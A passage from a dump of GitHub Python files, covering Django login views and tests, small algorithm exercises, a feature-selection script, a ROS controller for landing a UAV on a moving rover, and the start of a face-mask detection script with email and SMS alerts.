request.user.is_authenticated():\n        return HttpResponseRedirect('/home')\n\ndef login_view(request):\n    if request.user.is_authenticated():\n        return HttpResponseRedirect('/home')\n\n    username = request.POST.get('username')\n    password = request.POST.get('password')\n    user = authenticate(username=username, password=password)\n\n    if user is not None:\n        login(request, user)\n\n        if request.user.is_staff:\n            logout(request)\n            return HttpResponseRedirect('/error/denied')\n\n        if request.user.is_authenticated():\n            return HttpResponseRedirect('/home')\n        else:\n            mensaje = 'El usuario existe pero esta deshabilitado'\n            logout(request)\n    else:\n        if request.POST:\n            mensaje = 'El usuario o contraseña son incorrecto'\n        else:\n            mensaje = ''\n\n    context = {'mensaje':mensaje}\n    return render(request, \"login_page.html\", context)\n\n@login_required(login_url='/login')\ndef home_page(request):\n    if not request.user.is_authenticated():\n        return HttpResponseRedirect('/')\n    return render(request, \"home_page.html\")\n\ndef logout_view(request):\n    logout(request)\n    return HttpResponseRedirect('/')\n\ndef denied(request):\n    referer = request.META.get('HTTP_REFERER')\n    context = {'referer':referer}\n    return render(request, \"extra/Oops.html\", context)\n","repo_name":"harmideros1/Mammoft_inventory","sub_path":"MAMMOFT_SW_3_4/MAMMOFT_inventory_1_0/app/login/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"34423026909","text":"'''\n1. You are given a number n, representing the number of rows.\n2. You are given a number m, representing the number of columns.\n3. You are given n*m numbers, representing elements of 2d array a, which represents a gold mine.\n4. You are allowed to take one step left, right, up or down from your current position.\n5. You can't visit a cell with 0 gold and the same cell more than once. \n6. Each cell has a value that is the amount of gold available in the cell.\n7. 
You are required to identify the maximum amount of gold that can be dug out from the mine if \n you start and stop collecting gold from any position in the grid that has some gold.\n\n'''\n\n\ndef solution(matrix, row, col, bag, is_visited):\n if row < 0 or row >= len(matrix) or col < 0 or col >= len(matrix[row]) or matrix[row][col] == 0 or is_visited[row][col] == True:\n return\n\n is_visited[row][col] = True\n bag.append(matrix[row][col])\n solution(matrix, row-1, col, bag, is_visited)\n solution(matrix, row, col + 1, bag, is_visited)\n solution(matrix, row+1, col, bag, is_visited)\n solution(matrix, row, col - 1, bag, is_visited)\n\n\nmatrix = [\n [0, 1, 4, 2, 8, 2],\n [4, 3, 6, 5, 0, 4],\n [1, 2, 4, 1, 4, 6],\n [2, 0, 7, 3, 2, 2],\n [3, 1, 5, 9, 2, 4],\n [2, 7, 0, 8, 5, 1]\n]\n\n\n_max = 0\nis_visited = [[False for col in row] for row in matrix]\nfor i in range(len(matrix)):\n for j in range(len(matrix[i])):\n if matrix[i][j] != 0 and is_visited[i][j] == False:\n collected_gold = list()\n solution(matrix, i, j, collected_gold, is_visited)\n total_gold = sum(collected_gold)\n if total_gold > _max:\n _max = total_gold\n\nprint(_max)\n","repo_name":"skarwa4491/Python-DSA","sub_path":"Level Up/recursion/gold_mine2.py","file_name":"gold_mine2.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"36335845559","text":"from django.contrib import admin\nfrom .models import Accounts,Accounttransactions,Customers\n# Register your models here.\n\nadmin.site.site_header = 'Bank Management Admin DASHBOARD'\n\n\"SELECT id_customer, name FROM customer\"\nclass CustomersTable(admin.ModelAdmin):\n list_display = [\"id_customer\",\"name\",]\n \n\nadmin.site.register((Accounts,Accounttransactions))\nadmin.site.register(Customers,CustomersTable)","repo_name":"mbagas/tubes_pbo","sub_path":"bank/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"4327955197","text":"# Write a function to shuffle a deck of cards. \n# It must be a perfect shuffle-in other words, each of the 52! permutations of the deck has to be equally likely. \n# Assume that you are given a random number generator which is perfect.\n\nimport random\n\ndef shuffle_cards(cards):\n \"\"\"\n Given a card of elements, \n shuffle the cards. 
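\n    This is the forward (\"inside-out\") Fisher-Yates shuffle: picking rand uniformly\n    from [0, i] at step i makes all n! orderings equally likely.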
\n Solution: iterate through the card, swapping each element with a random element\n \"\"\"\n \n for i in range(len(cards)):\n \n rand = random.randint(0,i)\n \n # temp = cards[rand]\n # cards[rand] = cards[i] \n # cards[i] = temp\n\n cards[i], cards[rand] = cards[rand], cards[i]\n \n return cards\n\nprint(shuffle_cards([1,2,3,4,5]))","repo_name":"Nyandwi/algorithms","sub_path":"challenges/shuffle_cards.py","file_name":"shuffle_cards.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"34"} +{"seq_id":"28129236604","text":"def solution(sentence, keyword, skips):\n result = ''\n for i in range(len(skips)):\n skip = skips[i]\n key = keyword[i % len(keyword)]\n now, sentence = sentence[:skip], sentence[skip:]\n if key in now:\n idx = now.index(key)\n now1, now2 = now[:idx+1], now[idx+1:]\n result += (now1 + key)\n sentence = now2 + sentence\n else:\n result += (now + key)\n if len(sentence) == 0 and i < len(skips) - 1:\n if skips[i+1] == 0:\n continue\n else:\n break\n result += sentence\n return result\n\n\nprint(solution(\"i love coding\", \"mask\", [0, 0, 3, 2, 3, 4]))\nprint(solution(\"i love coding\", \"mode\", [0, 10]))\nprint(solution(\"abcde fghi\", \"axyz\", [3, 9, 0, 1]))\nprint(solution(\"encrypt this sentence\", \"something\", [0, 1, 3, 2, 9, 2, 0, 3, 0, 2, 4, 1, 3]))","repo_name":"sungyeon-0975/algo_study","sub_path":"220106/암호화_yoon.py","file_name":"암호화_yoon.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"44746270353","text":"from django.test import TestCase, Client\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import reverse\n\nimport tempfile\nfrom PIL import Image\n\nfrom .models import Post, Group\n\n\nclass TestImg(TestCase):\n def setUp(self):\n self.client = Client()\n self.user = User.objects.create_user(\n username='alice', email='mynameis@alice.ru', password='12345'\n )\n self.client.force_login(self.user)\n self.group = Group.objects.create(title='group', slug='noname')\n self.post = Post.objects.create(\n text='Follow the white rabbit.', author=self.user, group=self.group)\n\n def test_page_with_img(self):\n with tempfile.NamedTemporaryFile(suffix='.png', delete=False) as f:\n image = Image.new('RGB', (200, 200), 'white')\n image.save(f, 'PNG')\n with open(f.name, mode='rb') as img:\n self.client.post(reverse('post_edit', kwargs={\n 'username': self.user.username, 'post_id': self.post.id}),\n {'text': 'Image', 'image': img, 'group': self.group.id})\n tag = 'img class=\"card-img\" src=\"/media/'\n response = self.client.get('')\n self.assertContains(response, tag,\n msg_prefix='Тэг не найден на главной странице')\n response = self.client.get(\n reverse('profile', kwargs={'username': self.user.username}))\n self.assertContains(response, tag,\n msg_prefix='Тэг не найден в профайле пользователя')\n response = self.client.get(\n reverse('post', kwargs={'username': self.user.username,\n 'post_id': self.post.id}))\n self.assertContains(response, tag,\n msg_prefix='Тэг не найден на странице просмотра поста')\n response = self.client.get(\n reverse('group', kwargs={'slug': self.post.group.slug}))\n self.assertContains(response, tag,\n msg_prefix='Тэг не найден на странице группы')\n\n def test_not_img(self):\n with tempfile.NamedTemporaryFile(suffix='.txt', delete=False) as f:\n f.write(b'Test text')\n with open(f.name, mode='rb') as not_img:\n response = 
self.client.post(reverse('post_edit', kwargs={\n                    'username': self.user.username, 'post_id': self.post.id}),\n                    {'text': 'Not image', 'image': not_img}, follow=True)\n                self.assertIn('image', response.context['form'].errors)\n","repo_name":"Caterina-Plewako/Yatube","sub_path":"posts/tests/testimg.py","file_name":"testimg.py","file_ext":"py","file_size_in_byte":2664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"7824748112","text":"from concrete_autoencoder import ConcreteAutoencoderFeatureSelector\nfrom keras.utils import to_categorical\nfrom keras.layers import Dense, Dropout, LeakyReLU\nimport numpy as np\nimport scipy.io\nfrom sklearn.model_selection import StratifiedKFold, train_test_split\nimport Paras\nimport Base\n\nfrom keras.datasets import mnist\n\n\ndef decoder(x):\n    x = Dense(320)(x)\n    x = LeakyReLU(0.2)(x)\n    x = Dropout(0.1)(x)\n    x = Dense(320)(x)\n    x = LeakyReLU(0.2)(x)\n    x = Dropout(0.1)(x)\n    x = Dense(2)(x)\n    return x\n\ndef convertVectorMatrix(label):\n    y_m = np.zeros((len(label), 2))\n    indices_first = np.where(label == -1)[0]\n    y_m[indices_first, 0] = 1\n    indices_sec = np.where(label == 1)[0]\n    y_m[indices_sec, 1] = 1\n    return y_m\n\n\nif __name__ == '__main__':\n    import sys\n    dataset = sys.argv[1]\n    run = int(sys.argv[2])\n\n    #load data\n    mat = scipy.io.loadmat(Paras.data_dir + 'FSMatlab/'+dataset+'.mat')\n    X = mat['X'] # data\n    X = X.astype(float)\n    y = mat['Y'] # label\n    y = y[:, 0]\n\n    # ensure that y label is either -1 or 1\n    num_class, count = np.unique(y, return_counts=True)\n    n_classes = np.unique(y).shape[0]\n    assert(n_classes == 2)\n    min_class = np.min(count)\n    unique_classes = np.unique(y)\n    y[y == unique_classes[0]] = -1\n    y[y == unique_classes[1]] = 1\n    y = np.int8(y)\n\n    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=1617, stratify=y)\n    y_train = convertVectorMatrix(y_train)\n    y_test = convertVectorMatrix(y_test)\n    X_train, X_test = Base.normalise_data(X_train, X_test)\n    no_features = X_train.shape[1]\n\n    selector = ConcreteAutoencoderFeatureSelector(K=20, output_function=decoder, num_epochs=800)\n    selector.fit(X_train, y_train)\n\n    print('finish')\n","repo_name":"HoaiBach/DE-LSSVM","sub_path":"ConcreteAutoencoders/ConcreteAutoencodersFS.py","file_name":"ConcreteAutoencodersFS.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"9912621162","text":"#!/usr/bin/env python\nfrom __future__ import division\nimport rospy\nimport tf\nimport scipy.linalg as la\nimport numpy as np\nfrom math import *\nimport mavros_msgs.srv\nfrom mavros_msgs.msg import AttitudeTarget\nfrom nav_msgs.msg import Odometry\nfrom std_msgs.msg import *\nfrom geometry_msgs.msg import *\nfrom mavros_msgs.msg import *\nfrom quadcopter.msg import *\nimport time\nimport csv\nfrom timeit import default_timer as timer\nfrom gazebo_msgs.msg import ModelStates\nfrom geometry_msgs.msg import Twist\nfrom rosgraph_msgs.msg import Clock\n\n# #########################################################################################################################################################\n#\n# This is the code for landing a single UAV on a moving target with/without coordination\n# It is inbuilt with code for rover trajectory and flag changes\n#\n# 
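Control law sketch of the code below: each pass through sdre() rebuilds the\n# state-dependent weights Q from the current tracking errors, solves the continuous\n# algebraic Riccati equation A'P + PA - P B inv(R) B' P + Q = 0 for P, and applies\n# u = -inv(R) B' P x\n#\n# 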
#########################################################################################################################################################\n\n\n## Initialize node and publisher to UAV attitude and rover velocity topics\nrospy.init_node('sdre', anonymous=True)\npub = rospy.Publisher(\"/drone0/mavros/setpoint_raw/attitude\", AttitudeTarget, queue_size=1)\npub2 = rospy.Publisher(\"/rover/mavros/setpoint_velocity/cmd_vel_unstamped\", Twist, queue_size=1)\n\n## Getting plots\nposn = open('tight_square.csv', 'w')\n\n## Drone orientation\nroll = 0.0\npitch = 0.0\nyaw = 0.0\n## Rover orientations\nyaw2 = 0.0\ndetect = 0\nnow = rospy.get_time()\nnow_p = rospy.get_time()\n\nmsg = AttitudeTarget()\nmsg2 = Twist()\n\n## Goal is position of rover, goal_body finally contains errors in B\ngoal = np.array([0.0, 0.0, 0.0])\ngoal_body = np.array([0.0, 0.0, 0.0])\n\n## Information of drone\nx = 0.0\ny = 0.0\nz = 0.0\nv_x = 0.0\nv_y = 0.0\nv_z = 0.0\n\n## Rover prev velocities for acc calculations\nv1_p = 0.0\nv2_p = 0.0\nv3 = 0.0 ## Angular velocity about Z\n\npos_rover = [0,0,0]\nacc_rover = [0,0,0]\nvel_rover = [0,0,0]\n\nA = np.array([[0, 1, 0, 0, 0, 0, 0]\n ,[0, 0, 0, 0, 0, 0, 0]\n ,[0, 0, 0, 1, 0, 0, 0]\n ,[0, 0, 0, 0, 0, 0, 0]\n ,[0, 0, 0, 0, 0, 1, 0]\n ,[0, 0, 0, 0, 0, 0, 0]\n ,[0, 0, 0, 0, 0, 0, 0]])\n\nRot_body_to_inertial = np.array([[cos(yaw)*cos(pitch), -sin(yaw)*cos(roll)+sin(roll)*sin(pitch)*cos(yaw), sin(yaw)*sin(roll)+cos(roll)*cos(yaw)*sin(pitch)]\n ,[sin(yaw)*cos(pitch), cos(yaw)*cos(roll)+sin(roll)*sin(pitch)*sin(yaw), -sin(roll)*cos(yaw)+sin(yaw)*sin(pitch)*cos(roll)]\n ,[-sin(pitch), cos(pitch)*sin(roll), cos(pitch)*cos(roll)]])\nRot_inertial_to_body = Rot_body_to_inertial.transpose()\n\n## Trajectory for rover\n# rover_goal = [[3,0]\n# ,[3,3]\n# ,[6,3]\n# ,[6,-3]\n# ,[9,-3]\n# ,[9,3]\n# ,[12,3]\n# ,[12,-3]\n# ,[15,-3]\n# ,[15,3]\n# ,[18,3]\n# ,[18,-3]\n# ,[21,-3]\n# ,[21,3]\n# ,[24,3]\n# ,[24,-3]\n# ,[27,-3]\n# ,[27,3]\n# ,[30,3]\n# ,[30,-3]\n# ,[33,-3]\n# ,[33,3]\n# ,[36,3]\n# ,[36,-3]\n# ,[39,-3]\n# ,[39,3]\n# ,[42,3]\n# ,[42,-3]\n# ,[45,-3]\n# ,[48,3]\n# ,[51,3]\n# ,[51,-3]]\n\nrover_goal = [[8,0]\n ,[8,4]\n ,[-8,4]\n ,[-8,-0]\n ,[8,0]\n ,[8,4]\n ,[-8,4]\n ,[-8,-0]\n ,[8,0]\n ,[8,4]\n ,[-8,4]\n ,[-8,-0]\n ,[8,0]\n ,[8,4]\n ,[-8,4]\n ,[-8,-0]\n ,[8,0]\n ,[8,4]\n ,[-8,4]\n ,[-8,-0]\n ,[8,0]\n ,[8,4]\n ,[-8,4]\n ,[-8,-0]\n ,[8,0]\n ,[8,4]\n ,[-8,4]\n ,[-8,-0]\n ,[8,0]\n ,[8,4]\n ,[-8,4]\n ,[-8,-0]]\n\nflag2=0\nland = 0\nzhold = 10 # initial height, can also be taken as input\ndef sdre():\n while not rospy.is_shutdown():\n global flag2, x, y, z, roll, pitch, yaw, vel_rover, goal, goal_body, v_x, v_y, v_z, Rot_body_to_inertial, Rot_inertial_to_body, yaw2, acc_rover, v3, zhold, rover_goal, pos_rover, land\n\n ## For plots\n posn.write('%f;' % float(x))\n posn.write('%f;' % float(y))\n posn.write('%f;' % float(z))\n posn.write('%f;' % float(v_x))\n posn.write('%f;' % float(v_y))\n posn.write('%f;' % float(v_z))\n posn.write('%f;' % float(pos_rover[0]))\n posn.write('%f;' % float(pos_rover[1]))\n posn.write('%f;' % float(pos_rover[2]))\n posn.write('%f;' % float(vel_rover[0]))\n posn.write('%f;' % float(vel_rover[1]))\n posn.write('%f;' % float(vel_rover[2]))\n posn.write('\\n')\n\n ## If height > 2, follow form behind the rover, dont go too close\n if z>4:\n goal[0] = goal[0] - 2*cos(yaw2)*(1/(1+exp(-(z-6))))\n goal[1] = goal[1] - 2*sin(yaw2)*(1/(1+exp(-(z-6))))\n\n ## Hold position if not landing scenario\n if land==1:\n goal[2] = zhold\n\n print(goal, land)\n\n ## Goals are 
the errors here\n goal_body[0] = goal[0] - x\n goal_body[1] = goal[1] - y\n goal_body[2] = goal[2] - z\n\n ## The errors in body frame\n goal_body = np.dot(Rot_inertial_to_body,goal_body.transpose())\n\n # !!!! TEST\n # If mislanded, especially vision based, start regaining altitude\n if (sqrt(goal_body[0]**2 + goal_body[1]**2)>1 and land==0) or (detect==0):\n goal[2] = sqrt(goal[0]**2+goal[1]**2)\n\n #### Weighting Matrices Q R\n\n################################################################################\n\n######## USE THESE MATRICES FOR BASELINE CONTROL ########\n Q = np.array([[((goal_body[0])**2)/abs(0.5*goal_body[2]**2+0.0001)+10, 0, 0, 0, 0, 0, 0]\n ,[0, abs(150*(vel_rover[0]-v_x)/(0.001+0.01*abs(goal_body[0])+0.05*abs(goal_body[2]))), 0, 0, 0, 0, 0]\n ,[0, 0, ((goal_body[1])**2)/abs(0.5*goal_body[2]**2+0.0001)+10, 0, 0, 0, 0]\n ,[0, 0, 0, abs(150*(vel_rover[1]-v_x)/(0.001+0.01*abs(goal_body[1])+0.05*abs(goal_body[2]))), 0, 0, 0]\n ,[0, 0, 0, 0, 1+((30*goal_body[2])/sqrt(0.01+0.1*(goal_body[0]**2)+0.1*(goal_body[1]**2)))**2, 0, 0] #normal\n # ,[0, 0, 0, 0, 1+((10*goal_body[2]+10*(land))/sqrt(0.01+0.01*(goal_body[0]**2)+0.01*(goal_body[1]**2)))**2, 0, 0] #alt hold\n ,[0, 0, 0, 0, 0, 1/abs(goal_body[2]+0.001), 0] #normal\n # ,[0, 0, 0, 0, 0, (1-land+0.0001)/abs(goal_body[2]+0.001), 0] #alt hold\n ,[0, 0, 0, 0, 0, 0, 10/abs(goal_body[2]+0.001)]])\n\n R = np.array([[100, 0, 0, 0] #z - accn\n ,[0, 100, 0, 0] #Pitch\n ,[0, 0, 100, 0] #Roll\n ,[0, 0, 0, 300]])\n\n print(Q)\n################################################################################\n\n\n################################################################################\n\n########## USE THIS FOR VISION BASED CONTROL ########################\n # Q = np.array([[((10*goal_body[0])**2)/abs(goal_body[2]+0.0001)+50/abs(abs(goal_body[0]+0.00001)-1)+100/abs(goal_body[0]+0.00001), 0, 0, 0, 0, 0, 0]\n # ,[0, abs(20*(0.5+abs(goal_body[2]))*(vel_rover[0])/(0.001+0.01*abs(goal_body[0]+0.00001))), 0, 0, 0, 0, 0]\n # ,[0, 0, ((10*goal_body[1])**2)/abs(goal_body[2]+0.0001)+50/abs(abs(goal_body[1]+0.00001)-1)+100/abs(goal_body[1]+0.00001), 0, 0, 0, 0]\n # ,[0, 0, 0, abs(20*(0.5+abs(goal_body[2]))*(vel_rover[1])/(0.001+0.01*abs(goal_body[1]))), 0, 0, 0]\n # ,[0, 0, 0, 0, 1+(30*goal_body[2]/sqrt(0.01+0.01*(goal_body[0]**2)+0.01*(goal_body[1]**2)))**2, 0, 0] #normal\n # ,[0, 0, 0, 0, 0, 1/abs(goal_body[2]+0.001), 0] #normal\n # ,[0, 0, 0, 0, 0, 0, 10/abs(goal_body[2]+0.001)]])\n #\n # R = np.array([[800, 0, 0, 0] #z - accn\n # ,[0, 75000, 0, 0] #Pitch\n # ,[0, 0, 75000, 0] #Roll\n # ,[0, 0, 0, 2000]])\n\n\n################################################################################\n\n ## Calculation for control done in body fixed frame\n ## d2(e_x)/dt2 = 0-d2(x)/dt2 so all signs inverted\n\n ## X for baseline model as data we recieve is in global frame\n X = np.array([[goal_body[0]],[vel_rover[0]-v_x],[goal_body[1]],[vel_rover[1]-v_y],[goal_body[2]],[vel_rover[2]-v_z],[yaw2-yaw]])\n ## X for vision model as data from camera gives relative states\n # X = np.array([[goal_body[0]],[vel_rover[0]],[goal_body[1]],[vel_rover[1]],[goal_body[2]],[vel_rover[2]],[yaw2-yaw]])\n B = np.array([[0, 0, 0, 0], [0, 1, 0, 0], [0, 0, 0, 0], [0, 0, 1, 0], [0, 0, 0, 0], [1, 0, 0, 0], [0, 0, 0, 1]])\n P = la.solve_continuous_are(A, B, Q, R)\n\n ## Riccati Equation solving\n u = np.dot(-np.linalg.inv(R),B.transpose())\n u = np.dot(u,P)\n u = np.dot(u,X)\n\n ## Inputs thrust, roll, pitch, and yaw angular velocity\n u0 = float(u[0])\n u1 = float(u[1])\n 
u2 = float(u[2])\n u3 = float(u[3])\n\n ## Normalizing the received thrust\n u0 = ((acc_rover[2]-u0)*1.5 + 14.7)/29.4\n u1 = (acc_rover[0]-u1)/9.8\n u2 = (u2-acc_rover[1])/9.8\n u3 = v3-u3\n\n ## Making thrust non-negative\n if u0>1:\n u0 = 1\n if u0<0:\n u0 = 0\n\n ## Restrict rotation angles to 10 deg\n if u1>10*np.pi/180:\n u1 = 10*np.pi/180\n if u1<-10*np.pi/180:\n u1 = -10*np.pi/180\n if u2>10*np.pi/180:\n u2 = 10*np.pi/180\n if u2<-10*np.pi/180:\n u2 = -10*np.pi/180\n\n if abs(yaw2-yaw+2*np.pi)0.8:\n # u3 = 0.8\n # if u3<-0.8:\n # u3 = -0.8\n\n ## Start descending for small errors\n if sqrt(goal_body[0]**2+goal_body[1]**2)<0.8 and abs(goal_body[2])<1 and land==0:\n rospy.loginfo(\"LAND\")\n u0 = 0.0\n u1 = 0.0\n u2 = 0.0\n\n\n ## Convert to quaternions and publish\n quater = tf.transformations.quaternion_from_euler(u2,u1,yaw+np.pi/2) ## yaw+pi/2 only if mavros is used !!!!\n msg.header = Header()\n msg.type_mask = 0\n msg.orientation.x = quater[0]\n msg.orientation.y = quater[1]\n msg.orientation.z = quater[2]\n msg.orientation.w = quater[3]\n msg.body_rate.x = 0.0\n msg.body_rate.y = 0.0\n msg.body_rate.z = u3\n msg.thrust = u0\n pub.publish(msg)\n\n ## Rover trajectory\n ## Change goal of rover to next waypoint\n if sqrt((pos_rover[0]-rover_goal[flag2][0])**2 + (pos_rover[1]-rover_goal[flag2][1])**2) <= 2 and flag2!=len(rover_goal)-1:\n flag2+=1\n ## Based on flag2 decide to land or track\n if flag2%2 == 0:\n land = 1\n zhold = z\n else:\n land = 0\n\n ## Desired Heading and calculation of error in heading\n ang = atan2(rover_goal[flag2][1]-pos_rover[1],rover_goal[flag2][0]-pos_rover[0])\n if abs(ang-yaw2+2*np.pi)=0.78539:\n land = 1\n zhold = z\n elif flag2%2 != 0:\n land = 0\n\n ## Turning if heading error > 0.3rad\n if abs(ang-yaw2)>=0.3:\n ## Choose direction of rotation that reduces error\n if abs(ang-(yaw2+(ang-yaw2)*0.01))0.8:\n msg2.angular.z = 0.8\n if msg2.angular.z<-0.8:\n msg2.angular.z = -0.8\n if msg2.linear.x>1.5:\n msg2.linear.x = 1.5\n\n pub2.publish(msg2)\n rate = rospy.Rate(50)\n rate.sleep\n\n################################################################################\n\n# USE THIS ONLY IF YOU WANT DATA FROM MAVROS AND NOT GAZEBO\n\ndef callback(info):\n ##MUST GET HEADING\n global x, y, z, roll, pitch, yaw, vel_rover, vel_drone_rot, vel_drone_trans, head, error_head_prev, goal, goal_body, v_x, v_y, v_z, Rot_body_to_inertial, Rot_inertial_to_body\n\n ## Positions in global gazebo frame\n x = info.pose.pose.position.y\n y = -info.pose.pose.position.x\n z = info.pose.pose.position.z\n\n ## All linear velocities are local\n v_x = info.twist.twist.linear.x\n v_y = info.twist.twist.linear.y\n v_z = info.twist.twist.linear.z\n\n ## Orientations in order of rotation\n a1 = info.pose.pose.orientation.x\n b1 = info.pose.pose.orientation.y\n c1 = info.pose.pose.orientation.z\n d1 = info.pose.pose.orientation.w\n\n # roll, pitch, yaw = tf.transformations.euler_from_quaternion([a1,b1,c1,d1])\n\n ### Yaw in gazebo frame\n # yaw = yaw-np.pi/2\n\n Rot_body_to_inertial = np.array([[cos(yaw)*cos(pitch), -sin(yaw)*cos(roll)+sin(roll)*sin(pitch)*cos(yaw), sin(yaw)*sin(roll)+cos(roll)*cos(yaw)*sin(pitch)]\n ,[sin(yaw)*cos(pitch), cos(yaw)*cos(roll)+sin(roll)*sin(pitch)*sin(yaw), -sin(roll)*cos(yaw)+sin(yaw)*sin(pitch)*cos(roll)]\n ,[-sin(pitch), cos(pitch)*sin(roll), cos(pitch)*cos(roll)]])\n Rot_inertial_to_body = 
Rot_body_to_inertial.transpose()\n################################################################################\n\n\n################################################################################\n\n# ONLY FOR THE BASELINE MODEL\n\ndef callback2(info):\n global x, y, z, v_x, v_y, v_z, roll, pitch, yaw, goal, vel_rover, acc_rover, Rot_body_to_inertial, Rot_inertial_to_body, yaw2, now_p, v1_p, v2_p, v3, pos_rover\n now = rospy.get_time()\n\n if now-now_p == 0:\n pass\n else:\n ############################################################################\n # USE THIS ONLY IF YOU WANT TO GET DATA FROM GAZEBO, VELOCITY MUST BE CHECKED IF IN BODY FRAME\n\n # ## Drone information\n # x = info.pose[1].position.x\n # y = info.pose[1].position.y\n # z = info.pose[1].position.z\n #\n # v_x = info.twist[1].linear.x\n # v_y = info.twist[1].linear.y\n # v_z = info.twist[1].linear.z\n #\n # a1 = info.pose[1].orientation.x\n # b1 = info.pose[1].orientation.y\n # c1 = info.pose[1].orientation.z\n # d1 = info.pose[1].orientation.w\n # roll, pitch, yaw = tf.transformations.euler_from_quaternion([a1,b1,c1,d1])\n #\n # Rot_body_to_inertial = np.array([[cos(yaw)*cos(pitch), -sin(yaw)*cos(roll)+sin(roll)*sin(pitch)*cos(yaw), sin(yaw)*sin(roll)+cos(roll)*cos(yaw)*sin(pitch)]\n # ,[sin(yaw)*cos(pitch), cos(yaw)*cos(roll)+sin(roll)*sin(pitch)*sin(yaw), -sin(roll)*cos(yaw)+sin(yaw)*sin(pitch)*cos(roll)]\n # ,[-sin(pitch), cos(pitch)*sin(roll), cos(pitch)*cos(roll)]])\n # Rot_inertial_to_body = Rot_body_to_inertial.transpose()\n\n ############################################################################\n\n ## Drone orientations alone\n a1 = info.pose[1].orientation.x\n b1 = info.pose[1].orientation.y\n c1 = info.pose[1].orientation.z\n d1 = info.pose[1].orientation.w\n roll, pitch, yaw = tf.transformations.euler_from_quaternion([a1,b1,c1,d1])\n\n ## Rover information\n pos_rover[0] = info.pose[2].position.x\n pos_rover[1] = info.pose[2].position.y\n goal[0] = info.pose[2].position.x+8 ## adding initial UAV position to get in mavros frame\n goal[1] = info.pose[2].position.y+0 ## adding initial UAV position to get in mavros frame\n goal[2] = 0.435\n\n a1 = info.pose[2].orientation.x\n b1 = info.pose[2].orientation.y\n c1 = info.pose[2].orientation.z\n d1 = info.pose[2].orientation.w\n roll2, pitch2, yaw2 = tf.transformations.euler_from_quaternion([a1,b1,c1,d1])\n\n ## Receive vel info and convert to body fixed frame\n v1 = info.twist[2].linear.x\n v2 = info.twist[2].linear.y\n v3 = info.twist[2].angular.z\n\n ## Calculate acceleration\n a1 = (v1-v1_p)/(now-now_p)\n a2 = (v2-v2_p)/(now-now_p)\n now_p = rospy.get_time()\n\n v = np.array([[v1]\n ,[v2]\n ,[0.0]])\n\n a = np.array([[a1]\n ,[a2]\n ,[0.0]])\n\n ## Converting from W to B\n v = np.dot(Rot_inertial_to_body, v)\n a = np.dot(Rot_inertial_to_body, a)\n\n vel_rover[0] = float(v[0])\n vel_rover[1] = float(v[1])\n vel_rover[2] = float(v[2])\n acc_rover[0] = float(a[0])\n acc_rover[1] = float(a[1])\n acc_rover[2] = float(a[2])\n v1_p = v1\n v2_p = v2\n################################################################################\n\n################################################################################\n\n# ONLY FOR VISION MODEL\n\n# def ReceiveTar(info):\n# global goal, vel_rover, Rot_inertial_to_body, now, now_p2, detect\n#\n# ## Receive position info\n# goal[0] = info.goal.x\n# goal[1] = info.goal.y\n# goal[2] = 0.435-z\n# detect = info.detected\n#\n# ## Receive vel info and convert to body fixed frame\n# v1 = info.vel.x\n# v2 = info.vel.y\n# v = 
np.array([[v1]\n# ,[v2]\n# ,[0.0-v_z]])\n# v = np.dot(Rot_inertial_to_body, v)\n# vel_rover[0] = float(v[0])\n# vel_rover[1] = float(v[1])\n# vel_rover[2] = float(v[2])\n\n################################################################################\n\ndef listener():\n # rospy.Subscriber('/kalman_filter', kalman, ReceiveTar) ## If using vision\n rospy.Subscriber(\"/gazebo/model_states\", ModelStates, callback2) ## If baseline model\n rospy.Subscriber(\"/drone0/mavros/local_position/odom\", Odometry, callback)\n sdre()\n rospy.spin()\n\nif __name__ == '__main__':\n try:\n listener()\n except rospy.ROSInterruptException:\n posn.close()\n pass\n","repo_name":"rishabbala/SDRE-based-Cooperative-UAV-Landing-on-High-speed-targets","sub_path":"quadcopter/script/single_UAV.py","file_name":"single_UAV.py","file_ext":"py","file_size_in_byte":19404,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"39947786566","text":"# import the necessary packages\nfrom tensorflow.keras.applications.mobilenet_v2 import preprocess_input\nfrom tensorflow.keras.preprocessing.image import img_to_array\nfrom tensorflow.keras.models import load_model\nfrom imutils.video import VideoStream\nfrom datetime import datetime\nfrom twilio.rest import Client \nimport numpy as np\nimport imutils\nimport face_recognition\nimport time\nimport cv2\nimport os\nimport requests\nimport json\nimport secretKey\nimport smtplib\n\n#connecting to mail server \n\nserver = smtplib.SMTP()\nserver._host = \"smtp.gmail.com\"\nserver.connect(\"smtp.gmail.com\",587)\nserver.ehlo()\nserver.starttls()\nserver.ehlo()\n\nserver.login(secretKey.MY_MAIL_ADDRESS , secretKey.MY_MAIL_PASSWORD)\n\n\nf = open('data.json', 'r')\ndata = json.load(f)\ndata = data[\"data\"]\n\n\n\ndef findEncoding(images):\n\tencodeList = []\n\tfor img in images:\n\t\tcurImg = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\t\tencode = face_recognition.face_encodings(img)[0]\n\t\tencodeList.append(encode)\n\treturn encodeList\n\n\npath = 'knownImage'\nimages = []\ncontactNumber = []\nmailArr = []\nname = []\nmyList = os.listdir(path)\n\nfor img in myList:\n\tcurImg = cv2.imread(f'{path}/{img}')\n\timages.append(curImg)\n\tindex = os.path.splitext(img)[0]\n\tindex = int(index)\n\tcontactNumber.append(data[index]['contact'])\n\tmailArr.append(data[index]['mail'])\n\tname.append(data[index]['name'])\n\nencodeList = findEncoding(images)\n\n\n\ndef detect_and_predict_mask(frame, faceNet, 